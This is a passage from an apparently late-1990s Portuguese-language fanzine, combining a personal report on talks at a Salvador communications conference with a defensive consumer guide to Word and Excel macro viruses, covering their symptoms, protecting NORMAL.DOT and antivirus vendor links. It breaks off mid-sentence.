para pensamento. Quando voce imagina que uma grande parte da humanidade nao
tem o que comer, no entanto voce passa de carro por uma favela e ve o a
quantidade de antenas de TV, incluindo Parabolicas, existe uma fome por
informacao. Tudo bem que essa informacao pode nao ser a mesma que a gente
imagina, pode ser a loira do tcham. Mas e impressionante o avanco das
parabolicas incluindo nas favelas. Sera que esse pessoal realmente
aproveita toda a gama de canais internacionais que a channel TV
proporciona? Por outro lado, sera que o pessoal digere essa informacao.
Tudo que a pessoa capta, e transformado em atitude, em coisa util para a
evolucao da pessoa humana?  E a Dolly? Sera que toda essa polemica em torno
da possibilidade de se duplicar uma ovelha nao e um sinal de que o ser
humano pode estar sendo desvalorizado? Nao trouxe muitas conclusões, mas
foi uma palestra que marcou, pelo menos para mim.

A outra palestra, a do Paulo Vaz, essa foi um pouco mais "insossa". O
palestrante nao precisa ser brilhante, desde que o ouvinte seja sabio. O
cara e brilhante, mas nao estava conseguindo desenvolver o assunto legal de
forma que falasse a lingua do povo que estava la. Bem tipo tentar ler
"Critica da Razao Pura". Quando conseguiu encontrar o vocabulario correto
para a plateia, ja tinha esgotado o tempo. Mas o que consegui entender,
quando a coisa ficou mais clara foi o seguinte: antes, a pessoa ia pra
escola, estudava e tinha certeza de usar aquilo que estudou mais tarde.
Atualmente, com o excesso de informacao disponivel, a coisa ficou um pouco
diferente. Nao e so isso. O conceito de mundo esta se alterando muito
rapido. Ate ai normal, todo mundo sabe. Mas o "tcham" da coisa e que o
saber virou plastico. O que era antes algo passado as vezes de pai pra
filho agora virou coisa de email. Aquele conhecimento que demorava anos pra
pessoa "garimpar" virou coisa de algumas semanas na internet. E dai? Dai
que o futuro e feito por nos e nossas expectativas em relacao a ele. O
futuro vai ser aquilo que quisermos que ele seja. Nao vai ser o que o Bill
Gates disse nem o que o qualquer profeta qualquer falar, mas o que a
humanidade achar que deve fazer. Papo meio cabeca. O sujeito teve que
terminar antes que desenvolvesse mais o assunto.

Essa coisa de conhecimento "plastico" tem pra mim todo um outro
significado. Uns dez ou vinte anos atras, li uma revista "proibida para
menores" (vale a pena explicar que naquele tempo, o Brasil inteiro era
proibido para menores de 18 anos - teve revistas que adquiriram status de
publicacao de alto nivel. Isso porque a censura deixava passar algumas
materias de alto nivel nessas publicacões, alta filosofia e mulher pelada
so saia em revista "proibida pra menores de 18"). Tinha uma materia sobre
geralistas e especialistas. Parece incrivel eu falar de hacking e mencionar
esse tipo de coisa, mas o fato e que o mundo ate entao, ate mesmo hoje,
valoriza o cara que se especializa numa materia. O fulano que e PHD nisso
ou Doutorado naquilo, aquele cara que sabe tudo sobre um determinado
assunto. Geralista e o cara que nao se especializa em nada ou melhor, sabe
muito sobre mais de uma especialidade. Havia estas duas categorias.
Atualmente, o saber nao e mais "especialista" ou "geralista". E'
 "plastico".

Traduzindo para informatiquez:  se voce e um especialista em UNIX, teu
saber nao muda com o passar dos anos. Ele acumula. A pessoa evolui com o
Unix e aprende mais programas para usar, ate dar no em pingo d'agua com
ele. Tem todo um universo que a pessoa aprende.  Hard way, mas tudo bem.
Agora, se voce usa Windows ou software da Microsoft, experimenta ficar fora
do seu ambiente de trabalho dois ou tres anos. Se voce era um especialista
em Windows, tudo bem, com o mesmo tempo disponivel podia aprender
multi-midia, desktop publishing, edicao de textos, etc, etc.. mas se fosse
para uma ilha deserta e voltasse dois anos depois, tudo aquilo nao ia valer
nada diante do windows 95 ou win98. Quem esta se esforcando pra aprender
coisa em windows, se esforcou para aprender conhecimento plastico, facil de
ficar obsoleto, embora mais facil de usar e configurar... Nao sei se
transmiti a ideia. O geralista seria o cara que se vira  tanto em Unix,
quanto no windows, e se sair nova versao, abandona o que ja aprendeu e vai
em frente (ou seja, 90% dos hackers). Traduz esses conceitos e ideias para
coisas como: profissao, faculdade, emprego, etc.. Foi o que entendi, talvez
o Paulo Vaz tivesse outras ideias.. vai saber o que esse pessoal de
filosofia (ou sei la' a area dele) pensa. Se voce fala que entende, eles
falam outra coisa. Nada do que esta' nesse paragrafo ele falou, eu que to
tentando passar o que entendi. Talvez isso acenda uma lampada na cabeca de
voces leitores..

14/10 - 19:00   Espaco Virtual: outros mercados

Na verdade, cheguei ja tinha comecado. Ainda caindo de sono e pra piorar as
coisas, como nao achava que ia ser grande coisa, nao trouxe fita pra gravar
as palestras. Oh, do..  Pior e que me entupi de acaraje e o sono tambem nao
tava facil.. o programa falava em Claudio Cardoso (Facom/UFBA) tenho uma
vaga memoria da palestra (o pior e que nao tenho nenhuma certeza se foi ele
ou outra pessoa no lugar dele, se ele estiver lendo, sorry).

A palestra seguinte foi de um soteropolitano, cujo nome nao me lembro
direito mesmo. O cara e publicitario. Pra que vou fazer publicidade dele no
Barata Eletrica? Nao to ganhando pra isso.. o cara fez tanta questao de
falar em money.. Sujeito arretado. Contou a historia de como a Web page
dele transformou sua agencia de publicidade num sucesso. Sucesso leia-se:
"fiz minha pagina num tempo em que os jornais de Salvador nao tinham muito
o que falar da internet em ambito LOCAL, entao publicavam noticia sobre
qualquer coisa que fosse feita nesse assunto". Isso significa que a pagina
dele, alem de um conteudo interessante, teve o que toda agencia de
publicidade gostaria de ter: noticia de jornal falando dela. O resto e
facil, basta um conteudo bem povao, leia-se receitas de comidas tipicas e
coisas que todo mundo gosta mas que na epoca, com a internet comecando, nao
tinha. Acho que eram coisas de horoscopo e simpatias.. o povo baiano e bem
mistico. Bom, o fato e que a mistura funcionou e todo mundo comentou a
pagina dele. Provavelmente faltava conteudo em portugues na epoca. Entao,
um caso de estar na hora certa com uma disposicao especifica e os materiais
na mao.

O resto da palestra podia ser sintetizado assim: "como sou inteligente,
tudo aconteceu da forma prevista no tempo certo, com precisao de relogio"
ou "so um genio do marketing que nem eu teria visto isso" e "internet tem
que priorizar o lado comercial sim, o cara vai desenvolver um web site, tem
que receber uma baita grana pra coisa ficar boa". Eu caindo de sono e tendo
que ouvir isso. O Andre ate fez um contra-ponto, mostrando que na internet
nao era bem assim e que gente com boas intencões fazia acontecer e etc,
etc.. comentando esforcos de gente que nem eu. Falou tao legal que ate me
deu "animo" pra fazer umas perguntas ("capciosas") depois.

O que levantou um pouco o astral foi a palestra da Marion Strecker, do
todo-poderoso Universo On Line. Ou deveria dizer: o futuro Braz-Compuserve?
Achei genial porque os chats do UOL (enquanto servico gratuito) sao uma
verdadeira coqueluche em varias faculdades da USP. Gente que morria de medo
de computador agora fica direto la ou www.zaz.com.br que parece que tambem
tem o servico. E .. de vez em quando pintam umas coisas, como a pesquisa
sobre a juventude do futuro, feita pela Agencia Folha ou sei-la o que. E'
tudo grupo Folha, para mim, apesar de saber que o UOL e um baita provedor
internet, etc, etc.. Foi otima a palestra, porque ela mostrou e discutiu o
esforco da empresa em criar esse ambiente cyber, desenvolver paginas para
varias revistas, reunir tudo num so lugar, coisas do genero. Depois falou
da tal pesquisa: "O jovem, a sociedade e a midia do proximo milenio".
Estragou uma parte da minha fala. Tem varias formas de analisar aqueles
resultados. Mas sao pesquisas importantissimas. Sao estes graficos que os
caras mostram pros anunciantes na hora de conversar os precos dos anuncios:
"ta vendo, nossos anuncios sao caros porque funcionam, olha so quanta gente
acessa". E o esforco do UOL para ter um dos maiores numeros de acesso,
alcancando o Yahoo (alias desenvolveram sua propria ferramenta de busca).

Em seguida (e esta foi a parte que mais gostei), falaram sobre o perfil do
trabalhador do futuro, no que se refere ao UOL. Infelizmente, nao gravei
esta parte, gente. Tava morto de sono e portanto nao tenho certeza de tudo
o que ouvi, mas acho que foi mais ou menos assim: "Para nos, o profissional
do futuro tera que ser capaz de atuar em varias areas. Tem que ser capaz de
dominar uma lingua estrangeira, de preferencia, ter vivido num pais ou
outra cultura. Saber tambem se situar com um computador, sendo capaz tanto
de assumir o papel de editor como diagramador em linguagem html. Tem que
ter um vocabulario rico e ser capaz de escrever com um estilo conciso,
inteligente e ligeiramente sarcastico, ter uma iniciativa capaz de sozinho
fazer uma publicacao".  Nao, nao foram estas palavras, mas eu juro que a
Marion descreveu o trabalho que eu faco no Barata Eletrica. Tudo bem..
chegou a epoca das perguntas:

"Qual o interesse da UOL em fazer esse universo tao legal e gratuito? E'
fazer propaganda do servidor internet UOL?"

Ela confirmou que realmente o material disposto no UOL nao se paga, as
revistas que podem ser consultadas la gratuitamente nao representam um
retorno financeiro que compense. Uma semana depois, quando voltei a
acessar, descobri que varias areas do UOL passaram a ser especificas para
assinantes (e uma promocao "traia o seu servidor, mude para ca"). Ou seja:
primeiro, acostumaram todo mundo com um ambiente de acesso gratuito a
informacao, areas de chat, etc.. depois comecaram a cobrar. Me lembro
alguma coisa sobre ela ter me dito que a UOL tinha comprado o que antes era
conhecido como Compuserve, uma multinacional no que se refere a acesso rede
nao-gratuito. O Compuserve e o que seria a internet nao-gratuita; um
shopping center da informacao. Ate o correio eletronico, se a pessoa
receber muito, paga mais caro.

Mas o que mais me deu prazer foi no final da palestra, quando ja estava
todo mundo indo embora, perguntar para ela, nao na frente de todo mundo
(achei que seria meio indelicado) algo.. meio pessoal. Seguinte: o UOL
tinha aberto vaga para redator. 2 paus por mes. Uma pagina de curriculo
cujo formulario voce preenchia on-line. Eu tinha preenchido esse formulario
(embora deixasse em branco algumas coisas e nao falasse toda a minha vida,
se eu preenchesse tudo, o cara dos Recursos Humanos ia poder escrever minha
biografia). Bom. Nunca recebi uma unica resposta. E eu sou tudo aquilo que
ela tinha falado (ta bom, minhas paginas html nao sao aquela coisa, mas eu
faco). Nunca recebi uma resposta por email. Que que ela achava disso?  "E' ,
voce tem razao, o minimo era ter te mandado um email de volta, nao sei o
que aconteceu". Ai eu falei pra ela: "deve ser por causa da idade" ela:
"nao, por isso nao. Nao sei o que pode ter sido".

Perguntei isso em particular (e nao em publico) porque me lembrei de um
leitor do Barata que chegou para mim (sobre um artigo de "curriculum vitae"
e um texto sobre geracao X) e contou como "detonou" com a palestra de um
executivo de multinacional. Falou no inicio "queremos o nivel maximo de
lealdade dos nossos funcionarios" e perto do final falou "infelizmente,
teremos que realizar grandes cortes na folha de pagamento para poder manter
a empresa". O palestrante nao sabia o que responder quando esse meu amigo
perguntou: "como e que voce espera manter a lealdade de um funcionario que
sabe que pode NÃO estar numa lista de Schindler (obs: a lista dos que vao
continuar na empresa)?".

A maioria das empresas contratam quem eles querem, despedem quando estao a
fim  e talento ou competencia nao tem nada a ver. Se tivesse, varios
politicos nao teriam conseguido galgar o poder ate chegar a deputado,
senador ou presidente.

Dia 15/10 - 15:00  Politicas e leis das tecnologias digitais

Finalmente, to na mesa com o Vicente Landim (Ministerio da Ciencia e
Tecnologia). Esclareceu algumas coisas incriveis sobre jurisdicao antes da
conferencia comecar. A palestra que tinha preparado nao foi tao
interessante quanto poderia ter sido. Falha tecnica. Simplesmente ele tava
por dentro de coisas mais interessantes, mas na hora so tinha trazido
aquilo que falou. Ta gravado, mas ja esqueci o que e. So sei uma coisa: e
legal que o pessoal comece a se mobilizar contra a legislacao sobre o
ciberespaco que aquele "senhor" da Paraiba esta aprontando. Comece a
pressionar o congresso para nao aprovar. O dia em que ela for aprovada eu
paro de publicar o Barata Eletrica.

A palestra do Andre Lemos foi bem decente. Tudo o que eu nao falei na minha
ele falou e completou na dele. Ciberespaco, PGP, Clipper, Criptografia,
Operacao Sundevil, Computer Underground, achei que nao ia dar tempo. Como
chefe da mesa, ele conseguiu. Muito boa.

A minha foi um breve (45 minutos) historico sobre como fiz o primeiro
fanzine em lingua portuguesa na Internet. O porque do nome, consegui minha
conta internet, sendo da Letras, numa epoca em que nem todo o pessoal do 3o
ou 4o ano do IME-USP (Instituto de Matematica e Estatistica da USP) sabia
disso. Foi "tao emocionante". O pessoal curtiu a coisa. Fui meio hilario
uma hora, mas pelo menos ninguem dormiu.

Foi legal pra mim porque senti meu trabalho sendo reconhecido, do ponto de
vista academico.
Fiz a prova de Pos em Jornalismo. Eles queriam 7.0, eu
tirei 5.0. Chato para eles e para a Faculdade de Jornalismo da USP. Por
hipotese, amanha os alunos daquela faculdade e de muitas outras de
jornalismo no Brasil, vao estar estudando experiencias como a minha. Isso e
um fato, nao e viajar na maionese. E (hipotese) se daqui a cem anos o
pessoal resolver que meu trabalho merece elogios, nao vao falar que foi
"culpa" ou "influencia" da faculdade de jornalismo. Se bem que passei na
Pos em outro lugar da USP e parece que alguem de jornalismo vai co-orientar
minha tese.

15/10 - 19:00 - Um novo jornalismo: informatizado/online

Umas pustas dumas palestras interessantes. Mais ainda porque teve gente que
NÃO veio. Conheci o Fernando Vilela, editor do "G???? ?? I??????.??", entre
outros palestrantes. Mas antes tivemos que ouvir uma palestra ate  razoavel
de um cara da prefeitura, contando como funciona(ria) a Secretaria de
Comunicacao de Salvador. Tinha gente na plateia que garantiu que quase tudo
ali era teoria. Teoricamente, um pessoal ficaria de olho nos jornais,
recortando as materias sobre a politica local, recortaria, faria um resumo
sobre o que valesse a pena, depois faria copias, mandaria via taxi para
outro escritorio que  tomaria ou nao uma posicao a respeito, outro resumo
do que fazer e nao fazer, outro relatorio para ser copiado e despachado
para todas as reparticões administrativas da cidade de Salvador. Isso o
sujeito ficou descrevendo durante meia hora, para depois falar que uma
intranet permitiu reduzir consideravelmente os problemas de se levar essa
papelada toda pra la e pra ca pela cidade, em plena hora do rush, que e
quando tudo ficava pronto. Interessante do ponto de vista de logistica,
mais nada.

A do Fernando Vilela, "o mineiro mais carioca nascido em Brasilia", era bem
esperada pela plateia. Tava muito nervoso pra falar em publico. Comentou do
problema de excesso de informacao (perdeu um pouco do pique de ficar por
dentro de tudo, mas por questões profissionais nao podia mudar os habitos).
Apresentou algumas ideias fantasticas que estava desenvolvendo para a Pos,
como por exemplo o que seria dois planetas interligados pela internet, se
eles funcionariam como seres vivos gigantescos, umas coisas que a
cibercultura anda pensando aqui e ali. Tambem falou da experiencia dele com
a ???????.??, quatro ou cinco pessoas que estavam na faculdade e se uniram
pra fazer aquela revista. Foi legal bater um papo com o cara, apesar da
revista dele ate hoje nao ter incluido o Barata Eletrica no G??? ??
????????.??, ja que ate "Ze do Caixao" os caras colocaram. Falta de
informacao ou resolveram que "nao merece"? Semana passada dei uma olhada na
ultima edicao e parece que pelo menos mencionaram numa reportagem e de
forma ate boa. Nao tava ruim.

Houve tambem uma palestra de um outro professor da FACOM (Faculdade de
Comunicacao), nao me lembro se foi o Marcos Palacios, que fez uma
explendida exposicao da tecnologia Push e o futuro da imprensa escrita
versus o jornalismo via internet. Nao cabe aqui explicar todos os detalhes.
Muita coisa. Basicamente, o que e o trabalho de um cara, que recebe todas
as noticias e tenta encaixar em uma ou duas paginas, na va tentativa de
passar o que esta acontecendo no mundo la fora, esse trabalho pode ser
feito por qualquer um, ligado a internet. Da um artigo inteiro no  Barata
Eletrica. Talvez num proximo numero. Escrevendo isso, me lembro que teve
tambem o pessoal de outro jornal que entrou on-line que tambem deixou a
experiencia dele com o jornalismo na internet. A unica coisa que ficou e
que existe uma preocupacao em nao soltar determinadas noticias antes que a
edicao chegue as bancas, para nao prejudicar um determinado  "furo" de
reportagem. Nao tenho certeza se esse palestrante foi o Demostenes Teixeira
(Correio da Bahia) ou Alberto Oliveira (A Tarde). Ou se nao foi nenhum dois
e sim outra pessoa. To com o roteiro aqui na mao enquanto escrevo, mas teve
coisa que nao gravei e sei tambem que houve modificacões por conta de gente
que nao pode vir ou mudou de dia.

Outra palestra muito boa foi do Roberto Izabor (Telebahia). Massa. Explicou
em detalhes como foi a implantacao da primeira web-tv no Brasil, permitindo
ao pessoal la fora assistir nossa "maravilhosa" TV Globo. E entrou fundo em
trocentos detalhes referentes ao inicio, presente e futuro da Internet aqui
(ou deveria dizer la na Bahia). Falou da privatizacao das linhas
telefonicas, novas tecnologias, de novo o etc, etc..  Nao e coisa tambem
para meia duzia de linhas. Esse tipo de palestra eu gravo em fita k-7 pra
futura referencia.. qualquer dia boto num CD.

Depois da palestra fui numa festa da faculdade com um pessoal da
Comunicacao, incluindo umas meninas com quem tentei algumas tecnicas de
"Engenharia Social". Inutilmente. Qualquer um que mexa com producao
artistica da de dez em termos de jogo de cintura. Nao adianta nem "fingir"
sinceridade. Mas foi legal. Deu ate vontade de fazer Pos la, apesar que e
muito dificil. Os caras de la querendo descer para ca e caras daqui
querendo subir para fazer Pos la, onde tem alta concorrencia. E'  uma das
poucos Universidades no Nordeste onde tem essas materias. Rolou um papo em
cima, incluindo uma discussao sobre a tal "mineiridade". O pior e que as
pessoas tem curiosidade em saber o que um mineiro pensa disso. E'  meio
estranho discutir o tema. O pior e que quando entro nesse assunto, acabo
fazendo propaganda de uma tese que nao li, so folheei, chamada "a mitologia
da mineiridade" (Arruda, Maria A do Nascimento) defendida na USP. Minas
Gerais deve ser algo meio misterioso pra quem nao e de la..

Dia seguinte, 16/10, teve (de acordo com o roteiro):

   * Digitalizacao e espacos virtuais
   * O pixel e o pincel: a arte e as tecnologias digitais.

Infelizmente nao pude comparecer. Assim que o Gadelha me der um toque sobre
se a equipe fez ou nao a transcricao do evento e/ou gravacao das
conferencias que perdi, eu trabalho numa possivel continuacao dessa
materia, envolvendo o dia 16/10.

De resto, so dei uma role com o pessoal da Faculdade, que mostrou os pontos
turisticos, como o Pelourinho e as praias. Depois, aeroporto e back to Sao
Paulo. Foi tao rapida minha visita (medo de duas provas nos dias seguintes)
que nem entrei numa praia. Me da um medo ir pra uns lugares desse tipo.
Conheci um cara que foi passar as ferias no Ceara. Voltou 17 anos depois.
Nem o FGTS ele foi atras.

A I COM BAHIA e uma prova que ja se pode fazer uma conferencia Cyber no
Brasil. Nao e como quando fui para a Argentina. Tudo depende e de ter uma
soma de fatores: um ambiente legal, uma turma boa para organizar e gente
que apoie, tanto com patrocinios como com outros tipos de apoio. So acho
uma pena que quando fui nao avisei a mocada que conhecia em Salvador.  A
maior parte do publico era de gente da propria faculdade. Faltou um pouco
de divulgacao aqui no Sul, podia ter sido muito mais divulgado. Varios fas
do Barata Eletrica perderam a chance (parece coisa de convencido, mas
infelizmente ou felizmente, e fato, fazer o que?). Era um evento mais
ligado a Comunicacao e Jornalismo, mas hoje, quem se liga na Internet, tem
um pe dentro dessas duas materias. A Faculdade de Comunicacao da UFBA
mostra que iniciativa traz resultados concretos. Parabens.
Tudo o que voce sempre quis saber sobre
VIRUS DE MACRO(Word/Excel)

Quem e' que nunca ficou tentando salvar um documento no Word e ele
nao aceitava a extensao .DOC, mas so .DOT? Ou quem nunca ficou vendo
mensagenzinhas rolando na barra de status (rodape') do Word, achando
aquilo muito engracadinho?

Voce podia ate' nao saber, mas estava diante da categoria de virus
mais comum que existe hoje em dia: os virus de macro. NPAD, MDMA,
DMV, CAP, Indonesia, WordPrank, Concept, Nuclear... Em geral, pouco
mal trazem. Nao danificam arquivos nem provocam perda de dados, mas
causam uma serie de aborrecimentos que atrapalham todo o seu
trabalho. E tao grande quanto a sua difusao e a falta de informacao a
respeito deles.

Se voce chegou a ler este texto ate aqui, nao pare. Leia-o ate o
fim. Se preferir, imprima-o e leia depois com mais calma. E procure
principalmente divulgar o que aprender. A informacao e a vacina que
pode nos ajudar a livrar a Internet destes virus, tao simples mas tao
comuns.

------------------------------

O QUE E UM VIRUS?

Virus e' um programinha, com uma serie de instrucoes "maldosas" para
o seu computador executar. Em geral, ficam escondidos dentro da serie
de comandos de um programa maior. Mas eles nao surgem do nada. Sao
feitos por gente desocupada, que nao tem nada o que fazer e fica
criando bobagens para encher o saco dos incautos. E o pior e' que, em
geral, eles atingem seu objetivo.

Os virus se ocultam em arquivos executaveis, ou seja: de programas,
sempre de extensao .EXE ou .COM, ou de bibliotecas compartilhadas, de
extensao .DLL.

Quanto a arquivos de dados, voce pode abri-los sem medo! Assim, pode
rodar tranquilamente seus arquivos de som (.WAV, .MID), imagem (.BMP,
.PCX, .GIF, .JPG), video (.AVI, .MOV) e os de texto que nao contenham
macros (.TXT, .WRI).

Para que o virus faca alguma coisa, nao basta voce te-lo em seu
computador. Para que ele seja ativado, passando a infectar o micro,
e' preciso executar o programa que o contem. E isto voce so' faz se
quiser, mesmo que nao seja de proposito. Ou seja: o virus so e
ativado se voce der a ordem para que o programa seja aberto, por
ignorar o que ele traz de mal pra voce... Se eles nao forem
"abertos", ou seja, "executados", o virus simplesmente fica inativo,
alojado, aguardando ser executado para infectar o computador.

Apos infectar o computador, eles passam a atacar outros arquivos. Se
um destes arquivos infectados for transferido para outro computador,
este tambem vai passar a ter um virus alojado, esperando o momento
para infecta-lo, ou seja: quando for tambem executado. Dai o nome de
virus, pela sua capacidade de auto-replicacao, parecida com a de um
ser vivo.

------------------------------

VIRUS DE MACRO

Recentemente, vem se espalhando uma nova especie de virus, que hoje
ja' corresponde a mais de 50% do total de infeccoes. Sao os famosos
"virus de macro".

Eu recebi ontem mesmo um arquivo do Word contaminado com um "virus
de macro". E quem o enviou foi um amigo de Internet. Tenho certeza de
ele nao mandou o arquivo com maus propositos -- pelo contrario, e uma
vitima destes virus tanto quanto eu. Pra mim ja e uma rotina. De cada
dez arquivos de Word que recebo, um esta contaminado. Alias, e bem
provavel que seu computador ja tenha um virus de macro agora. So que
voce ainda nao percebeu, ou o deixou ficar quieto.

Mas afinal de contas, o que e macro? Macro e uma serie de rotinas
personalizadas para serem feitas automaticamente no Word, ou no
Excel, ou qualquer outro programa que suporte VBA (Visual Basic for
Applications), a linguagem usada nas macros. Os virus de macro mais
comuns sao os do Word, por ser o programa mais difundido.

Voce pode criar uma macro pra acrescentar um cabecalho
automaticamente assim que voce clica num botao da barra de
ferramentas, ou para abrir o Painel de Controle apenas com uma
combinacao de teclas, ou ainda para retirar todas as cedilhas,
acentos etc. de um texto. A macro e quase um programa, interno a
outro programa.

O virus de macro e um virus feito na linguagem das macros, para
funcionar dentro do programa ao qual esta ligado. Ao abrir um
documento de Word (.DOC) infectado com um virus de macro, o virus e
ativado, gravando sobre o arquivo NORMAL.DOT (modelo geral dos
arquivos do Word) e criando macros que substituem boa parte dos
comandos normais do Word.

A partir dai, quando voce estiver usando o Word, voce vai comecar a
verificar sintomas os mais diversos, dependendo do virus que voce
tem. Se voce verificar algum dos abaixo relacionados, provavelmente
seu computador ja esta infectado:

- quando voce tenta salvar um arquivo, ele salva com a extensao .DOT
em vez de .DOC;

- todos os arquivos do Word sao salvos assim que voce o fecha, como
Doc1.doc, ou Doc2.doc, e assim por diante, sem sequer perguntar se
quer salva-lo ou nao;

- uma mensagenzinha fica correndo pelo rodape da janela do Word;

- palavras ficam aparecendo sem voce digita-las e imediatamente se
apagam;

- a impressora trava sem explicacao;

- o computador fica "trabalhando" (ampulheta) sem que voce peca para
fazer nada;

- retira dos menus todas as mencoes a macro, de forma que voce fica
impedido de manipular as macros para retirar o virus;

- todas as macros personalizadas que voce tenha criado antes sao
perdidas (esta e a pior sequela).

Uma vez infectado o arquivo NORMAL.DOT, todos os outros arquivos
que forem abertos no Word a partir de entao serao infectados. Se voce
enviar um arquivo infectado para alguem, por disquete ou e-mail, ele
pode infectar o computador do destinatario, se ele o receber e o
abrir no Word, e o ciclo recomeca.

Os virus de macro nao estao escondidos na forma de um arquivo
executavel (.EXE, .COM, .DLL), mas em um inocente documento do Word
(.DOC) ou numa planilha do Excel (.XLS). Trata-se de uma verdadeira
revolucao dos virus. E ai esta a causa da facilidade com que eles se
propagam.

As macros se transformaram em verdadeiras armas postas à disposicao
de quem quer fazer um virus. Ninguem imagina que um texto que a
namorada escreveu ou uma planilha que um colega de trabalho mandou
possa estar infectado. E a pessoa que lhe enviou o arquivo com o
virus pode nem saber (e geralmente nao sabe) da infeccao...

Ainda assim, e bom frisar: mesmo os virus de macro so infectam seu
micro se voce abrir o arquivo que o contem. Nao basta receber o
arquivo infectado, seja por que meio for: e necessario abri-lo para
que o virus seja ativado.

------------------------------

COMO EVITAR OS VIRUS DE MACRO

O que podemos fazer para evitar virus de macro? Uma das opcoes e'
infalivel! Marcar o arquivo NORMAL.DOT como "somente leitura"
("read-only") e, de todas, a melhor opcao, e tambem a mais radical.

Como fazer isto? Em primeiro lugar, localize este arquivo.
Geralmente, ele fica no diretorio (ou pasta) onde esta o Word.

No Windows 95, basta clicar com o botao direito do mouse sobre o nome
do arquivo, selecionar "Propriedades" e marcar o quadradinho com o
nome "somente leitura".

No Windows 3.x, o procedimento e semelhante: abre-se o Gerenciador de
Arquivos, localiza-se o NORMAL.DOT, clica-se sobre ele uma vez so
com o mouse, e, no menu Arquivo | Propriedades..., marca-se o
"somente leitura".

E' tao facil assim evitar virus de macro? Em principio, sim. O
arquivo NORMAL.DOT e' o modelo global em que se baseiam todos os
documentos que feitos no Word, e e' o primeiro a ser infectado assim
que o virus se aloja. Se ele nao puder ser sobregravado, o arquivo
com o virus pode ate' ser aberto, mas nao vai conseguir modificar o
NORMAL.DOT, que esta protegido contra gravacao.

E se eu precisar mesmo alterar o NORMAL.DOT? Bem, este arquivo so
precisa ser modificado muito raramente, quando voce faz uma alteracao
em um parametro no modelo geral do Word -- por exemplo: escolhe uma
nova fonte padrao, ou uma margem maior, ou um estilo de documento, ou
um novo botao na barra de ferramentas, valido para todos os
documentos do Word. Pouca gente faz isto com frequencia. Se voce, por
acaso, precisar fazer uma destas alteracoes, basta desmarcar o
"somente leitura", fazer a alteracao e depois voltar a marca-lo.

Eu utilizo o VirusScan, que pode ser obtido gratuitamente na pagina
da McAfee -- alias, recomendo a todos que facam isto agora (nao deixe
para depois...). Vamos todos na pagina da McAfee
(http://www.mcafee.com) retirar a versao mais nova do anti-virus. O
arquivo mede cerca de 4 MB. Pode demorar ate uns 15 minutos,
dependendo de sua conexao, mas e um tempo muito bem investido. Se
voce for surpreendido por um virus mais tarde, voce vai ver que o
tempo (e o gasto de paciencia) para elimina-lo sera bem maior.

De 45 em 45 dias, retorne la para retirar a versao mais nova dos
arquivos DAT do anti-virus. Frise-se bem: depois que voce ja tem o
programa VirusScan, nao e mais necessario tirar todo o anti-virus de
novo quando sua versao ficar desatualizada. Basta retirar uns poucos
arquivos terminados com a extensao .DAT, que sao os que guardam
informacoes sobre os virus., que juntos, tem apenas 1 MB. Voce pode
obter a ultima versao destes arquivos .DAT diretamente no endereco:
http://www.mcafee.com/down/dldat.html

O processo para instalar os novos arquivos .DAT e um pouco mais
chato, por ser manual. Depois de retirar e descompactar os arquivos
.DAT, localize onde estao os seus atuais arquivos .DAT (ja
desatualizados) do VirusScan (em geral, estao em: c:\Arquivos de
Programas\McAfee\VirusScan\). Basta arrastar os novos arquivos .DAT
para esta pasta, confirmar a substituicao e pronto. Voce esta de novo
com as vacinas em dia.

Informacoes da McAfee sobre virus de macro:
http://www.mcafee.com/support/techdocs/vinfo/t0016.html

Outra opcao para prevenir virus de macro: va' na pagina da
Microsoft. La' existe uma ferramenta, chamada ScanProt, na verdade um
modelo (.DOT) com um conjunto de macros para protecao do Word. Voce o
abre no Word e a instalacao e automatica. O arquivo inclui um manual,
todo EM PORTUGUES, em formato Word, explicando tudo.

Este ferramenta vai avisa-lo sempre que um arquivo .DOC contendo uma
macro esta sendo aberto, mesmo que nao contenha virus. E permite que
voce opte por abrir o arquivo sem executar as macros.

        O endereco e':
http://www.microsoft.com/word/freestuff/mvtool/virusinfo.htm

O Word versao 95a ou o Word 97 ja trazem esta ferramenta embutida.
Mas ha' uma atualizacao dela em
http://www.microsoft.com/office/antivirus/word/wordprot.htm

        Para informacoes sobre virus de macro no Excel, va em
http://www.microsoft.com/excel/productinfo/vbavirus/emvolc.htm

------------------------------

Na primeira vez em que eu fui atacado por um virus de macro, eu
estava com o anti-virus instalado e funcionando. Mas, por um descuido
meu, a versao dos arquivos .DAT era de fevereiro. E ja corria o mes
de abril. Fui negligente achando que uns poucos meses de atraso nao
iam fazer diferenca. Fizeram, e muito! O virus que peguei
simplesmente nao foi detectado pelo anti-virus atrasado que tinha.
Dai, alerto: nao adianta nada ter um anti-virus se voce nao o
atualiza todo mes.

Depois da casa arrombada, passei o VirusScan ultima versao da epoca,
e ele detectou, de pronto, o virus CAP. Limpou, direitinho e com a
maior facilidade do mundo, os arquivos infectados.

Por uma coincidencia incrivel, naquela mesma semana eu estava
comentando sobre virus de macro com colegas. Um deles me disse que,
na reparticao onde ele trabalha, ha um virus de macro ha 5 meses, e
nunca ninguem cuidou de elimina-lo, apesar de todos os incomodos que
ele causa.

Assim que fui infectado, fui procurar ajuda no meu BBS. Um amigo me
disse, com ar de certo "desdem"... :-): Todo mundo tem este virus!

E verdade. Parece ate uma gripe. Todo mundo tem, e parece ate
inevitavel te-lo. Mas poderiamos fazer mais para evita-lo. Ou para
elimina-lo, depois de feito o estrago.

------------------------------

COMO ELIMINAR OS VIRUS DE MACRO

Quem tem um virus de macro so' nao o elimina se nao quiser. Os
anti-virus estao ai para detecta-los e elimina-los com facilidade. E
possivel encontrar um virus de macro mais dificil de ser removido,
mas sao casos excepcionais.

Para remover virus de macro, experimente um destes anti-virus:

McAfee Virus Scan: http://www.mcafee.com
F-Macrow: http://www.europe.datafellows.com
Dr. Solomon's Anti-Virus Toolkit: http://www.drsolomon.com
Norton Anti-Virus: http://www.symantec.com/avcenter/hotv.html
PC-Cillin 95: http://www.trendmicro.com.br
Thunderbyte Anti-Virus: http://www.thunderbyte.com
VirusSafe 95: http://www.eliashim.com/index.html
InterScan VirusWall: http://www.com.tw
F-Prot: http://www.commandcom.com
HouseCall: http://www.antivirus.com

------------------------------

COMO ELIMINAR SEQUELAS DOS VIRUS

Pode ser que, mesmo depois de eliminado o virus de macro, ainda
restem algumas sequelas no seu Word: menus faltando, botoes a menos,
travamentos, combinacoes de teclas desativadas.

Primeiro, tente seguir as dicas que voce encontra nesta pagina, no
site da McAfee: http://www.mcafee.com/t0118.html. La, voce pode
retirar o programa DocFix, especifico para resolver estes problemas.

Se nao der certo, ha uma solucao radical, mas eficiente, a ser
